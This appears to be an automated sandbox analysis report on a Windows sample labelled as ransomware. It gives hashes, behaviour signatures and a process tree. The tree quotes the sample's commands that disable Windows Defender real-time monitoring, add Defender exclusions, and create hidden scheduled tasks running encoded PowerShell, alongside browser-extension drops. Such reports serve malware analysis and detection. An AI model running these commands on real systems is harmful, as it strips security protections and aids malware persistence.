Analysis
-
max time kernel
109s -
max time network
111s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
24-05-2024 16:38
Static task
static1
Behavioral task
behavioral1
Sample
2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
Resource
win7-20240221-en
General
-
Target
2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
-
Size
6.7MB
-
MD5
f793b0bdfb3c06ba932dddffb5be9ad8
-
SHA1
b17c6d562c371f8140432354b4304ac4d03fe41f
-
SHA256
b9026fce43a810a6a6b216a2cf6d9a39e9cf265caac3b8c46de3a1bdef8a606d
-
SHA512
e587a085e39d6691b7ee55fda9581dd14fb175a619d5613a1370a5ae4bc661dfd8c6cbc82dbffb75787eb228778b88a8feddd1a9df83540ace73cbd15cf0d501
-
SSDEEP
196608:chjvlx3/aPRLJ5uuC49qd3rGC03XhzuxktD0:cdvb/wRLauu5GCWoxktD
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\boSLTBXAavlTIcMXJ = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dkHlCbgnIThowMMU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\EkAcBLsehYBU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LjPBjCkxU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dkHlCbgnIThowMMU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WEPOREuymMJJC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\yyjtaGBLEqUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\PtxASTBQXXYOENVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
Processes:
powershell.EXEpowershell.EXEpowershell.exepowershell.EXEpowershell.exepid process 1548 powershell.EXE 2644 powershell.EXE 2228 powershell.exe 2848 powershell.EXE 2472 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\International\Geo\Nation 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes:
2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gimgggabfigedfmidfhmgaaccgefdfnj\1.0_0\manifest.json 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe -
Drops file in System32 directory 9 IoCs
Processes:
powershell.EXE2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exepowershell.EXEpowershell.exepowershell.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Windows\system32\GroupPolicy\gpt.ini 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Drops file in Program Files directory 13 IoCs
Processes:
2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exedescription ioc process File created C:\Program Files\Mozilla Firefox\browser\features\{9A9F9ACC-B19C-4B66-8FE8-814016970733}.xpi 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\LjPBjCkxU\iXGGmtk.xml 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\EkAcBLsehYBU2\dvdQTlLWiBRXg.dll 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\mEOyqyi.dll 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\yyjtaGBLEqUn\xbiuorQ.dll 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\LjPBjCkxU\vQlWBX.dll 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\EkAcBLsehYBU2\nTMNVQy.xml 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\WEPOREuymMJJC\PfTTFbJ.dll 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\WEPOREuymMJJC\EwEvpwW.xml 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{9A9F9ACC-B19C-4B66-8FE8-814016970733}.xpi 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe File created C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\PjAmsXW.xml 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\RqexYqdylWmHLyb.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1508 2664 WerFault.exe 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe -
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2756 schtasks.exe 3004 schtasks.exe 1720 schtasks.exe 2272 schtasks.exe 1752 schtasks.exe 2224 schtasks.exe 1916 schtasks.exe 1108 schtasks.exe 692 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 42 IoCs
Processes:
powershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXE2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exepid process 2472 powershell.exe 2472 powershell.exe 2472 powershell.exe 1548 powershell.EXE 1548 powershell.EXE 1548 powershell.EXE 2644 powershell.EXE 2644 powershell.EXE 2644 powershell.EXE 2228 powershell.exe 2848 powershell.EXE 2848 powershell.EXE 2848 powershell.EXE 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
powershell.exepowershell.EXEpowershell.EXEpowershell.exeWMIC.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 2472 powershell.exe Token: SeDebugPrivilege 1548 powershell.EXE Token: SeDebugPrivilege 2644 powershell.EXE Token: SeDebugPrivilege 2228 powershell.exe Token: SeIncreaseQuotaPrivilege 1676 WMIC.exe Token: SeSecurityPrivilege 1676 WMIC.exe Token: SeTakeOwnershipPrivilege 1676 WMIC.exe Token: SeLoadDriverPrivilege 1676 WMIC.exe Token: SeSystemProfilePrivilege 1676 WMIC.exe Token: SeSystemtimePrivilege 1676 WMIC.exe Token: SeProfSingleProcessPrivilege 1676 WMIC.exe Token: SeIncBasePriorityPrivilege 1676 WMIC.exe Token: SeCreatePagefilePrivilege 1676 WMIC.exe Token: SeBackupPrivilege 1676 WMIC.exe Token: SeRestorePrivilege 1676 WMIC.exe Token: SeShutdownPrivilege 1676 WMIC.exe Token: SeDebugPrivilege 1676 WMIC.exe Token: SeSystemEnvironmentPrivilege 1676 WMIC.exe Token: SeRemoteShutdownPrivilege 1676 WMIC.exe Token: SeUndockPrivilege 1676 WMIC.exe Token: SeManageVolumePrivilege 1676 WMIC.exe Token: 33 1676 WMIC.exe Token: 34 1676 WMIC.exe Token: 35 1676 WMIC.exe Token: SeDebugPrivilege 2848 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exedescription pid process target process PID 2664 wrote to memory of 2092 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe cmd.exe PID 2664 wrote to memory of 2092 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe cmd.exe PID 2664 wrote to memory of 2092 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe cmd.exe PID 2664 wrote to memory of 2092 2664 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe cmd.exe PID 2092 wrote to memory of 1200 2092 cmd.exe forfiles.exe PID 2092 wrote to memory of 1200 2092 cmd.exe forfiles.exe PID 2092 wrote to memory of 1200 2092 cmd.exe forfiles.exe PID 2092 wrote to memory of 1200 2092 cmd.exe forfiles.exe PID 1200 wrote to memory of 2476 1200 forfiles.exe cmd.exe PID 1200 wrote to memory of 2476 1200 forfiles.exe cmd.exe PID 1200 wrote to memory of 2476 1200 forfiles.exe cmd.exe PID 1200 wrote to memory of 2476 1200 forfiles.exe cmd.exe PID 2476 wrote to memory of 2676 2476 cmd.exe reg.exe PID 2476 wrote to memory of 2676 2476 cmd.exe reg.exe PID 2476 wrote to memory of 2676 2476 cmd.exe reg.exe PID 2476 wrote to memory of 2676 2476 cmd.exe reg.exe PID 2092 wrote to memory of 2532 2092 cmd.exe forfiles.exe PID 2092 wrote to memory of 2532 2092 cmd.exe forfiles.exe PID 2092 wrote to memory of 2532 2092 cmd.exe forfiles.exe PID 2092 wrote to memory of 2532 2092 cmd.exe forfiles.exe PID 2532 wrote to memory of 2548 2532 forfiles.exe cmd.exe PID 2532 wrote to memory of 2548 2532 forfiles.exe cmd.exe PID 2532 wrote to memory of 2548 2532 forfiles.exe cmd.exe PID 2532 wrote to memory of 2548 2532 forfiles.exe cmd.exe PID 2548 wrote to memory of 2552 2548 cmd.exe reg.exe PID 2548 wrote to memory of 2552 2548 cmd.exe reg.exe PID 2548 wrote to memory of 2552 2548 cmd.exe reg.exe PID 2548 wrote to memory of 2552 2548 cmd.exe reg.exe PID 2092 wrote to memory of 2564 2092 cmd.exe forfiles.exe PID 2092 wrote to memory of 2564 2092 cmd.exe forfiles.exe PID 2092 wrote to memory of 2564 2092 cmd.exe forfiles.exe PID 2092 wrote to memory of 2564 2092 cmd.exe forfiles.exe PID 2564 wrote to memory of 2672 2564 forfiles.exe cmd.exe PID 2564 wrote to memory of 2672 2564 forfiles.exe cmd.exe PID 2564 wrote to memory of 2672 2564 forfiles.exe cmd.exe PID 2564 wrote to memory of 2672 2564 forfiles.exe cmd.exe PID 2672 wrote to memory of 2368 2672 cmd.exe reg.exe PID 2672 wrote to memory of 2368 2672 cmd.exe reg.exe PID 2672 wrote to memory of 2368 2672 cmd.exe reg.exe PID 2672 wrote to memory of 2368 2672 cmd.exe reg.exe PID 2092 wrote to memory of 2596 2092 cmd.exe forfiles.exe PID 2092 wrote to memory of 2596 2092 cmd.exe forfiles.exe PID 2092 wrote to memory of 2596 2092 cmd.exe forfiles.exe PID 2092 wrote to memory of 2596 2092 cmd.exe forfiles.exe PID 2596 wrote to memory of 2436 2596 forfiles.exe cmd.exe PID 2596 wrote to memory of 2436 2596 forfiles.exe cmd.exe PID 2596 wrote to memory of 2436 2596 forfiles.exe cmd.exe PID 2596 wrote to memory of 2436 2596 forfiles.exe cmd.exe PID 2436 wrote to memory of 2356 2436 cmd.exe reg.exe PID 2436 wrote to memory of 2356 2436 cmd.exe reg.exe PID 2436 wrote to memory of 2356 2436 cmd.exe reg.exe PID 2436 wrote to memory of 2356 2436 cmd.exe reg.exe PID 2092 wrote to memory of 2788 2092 cmd.exe forfiles.exe PID 2092 wrote to memory of 2788 2092 cmd.exe forfiles.exe PID 2092 wrote to memory of 2788 2092 cmd.exe forfiles.exe PID 2092 wrote to memory of 2788 2092 cmd.exe forfiles.exe PID 2788 wrote to memory of 2360 2788 forfiles.exe cmd.exe PID 2788 wrote to memory of 2360 2788 forfiles.exe cmd.exe PID 2788 wrote to memory of 2360 2788 forfiles.exe cmd.exe PID 2788 wrote to memory of 2360 2788 forfiles.exe cmd.exe PID 2360 wrote to memory of 2472 2360 cmd.exe powershell.exe PID 2360 wrote to memory of 2472 2360 cmd.exe powershell.exe PID 2360 wrote to memory of 2472 2360 cmd.exe powershell.exe PID 2360 wrote to memory of 2472 2360 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe"1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnMrBRaWy" /SC once /ST 02:14:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnMrBRaWy"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnMrBRaWy"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpEXrekzk" /SC once /ST 01:39:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpEXrekzk"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpEXrekzk"2⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"2⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
